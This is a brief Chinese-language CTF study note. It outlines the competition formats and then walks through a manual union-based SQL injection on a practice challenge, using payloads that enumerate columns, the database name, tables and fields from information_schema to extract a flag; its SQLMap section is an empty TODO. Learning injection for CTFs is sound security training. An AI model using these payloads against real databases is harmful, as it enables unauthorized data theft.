CTF
CTP(Capture the Flag),中文称“夺旗赛”,安全人员之间进行技术竞争的一种比赛。
比赛形式:
- 理论赛
- 夺旗赛:Crypto(编码)、Web(渗透)、MISC(杂项)、Reverse(逆向)、PMW
- AWD 网络攻防赛(团队赛、混战)
- CFS 网络攻防赛(团队赛、综合靶场)
常见 CTF 题目:https://www.ctfhub.com
SQL 注入
手动注入
我们使用联合注入的方式:
1️⃣ 判断列数、显示位
输入 1' order by 2# 回显,而输入 1' order by 3# 不回显,说明数据库查询了两列:
2️⃣ 获取目标数据库名
输入 -1' union select database(),2 # 获取数据库的名称为 sqli
3️⃣ 获取目标数据库的所有表名、字段名、字段中的数据
输入 -1' union select group_concat(table_name),2 from information_schema.tables where table_schema='sqli' #,获取得到表 new 和 flag
查找 flag 表,输入 -1' union select group_concat(column_name) ,2 from information_schema.columns where table_name='flag' # ,发现 flag 字段
输入 -1' union select flag,2 from sqli.flag #,最终得到 ctfflag
使用 SQLMap
// TODO